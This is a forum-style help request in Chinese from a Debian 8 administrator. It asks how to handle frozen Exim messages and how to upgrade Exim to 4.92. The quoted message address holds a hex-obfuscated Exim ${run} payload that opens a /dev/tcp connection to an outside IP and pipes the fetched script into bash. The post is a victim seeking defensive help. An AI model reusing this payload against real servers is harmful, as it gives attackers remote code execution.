最近,我开始收到类似的冻结消息。我有一台 Debian GNU / Linux 服务器 8.10 Exim 版本 4.84_2。每个人都报告说这个版本未经攻击确认,但我收到了以下消息:
root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x31\x35\x2e\x35\x36\x2e\x31\x36\x31\x2f\x34\x34\x33\x3b\x65\x63\x68\x6f\x20\x2d\x65 \x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost
我的系统中没有可疑进程和正在运行的 cron 作业。在这种情况下,您建议怎么做?我将非常感激您的宝贵建议。
我可以将 exim 升级到 4.92 版本吗?如何在 debian 8 上执行此操作?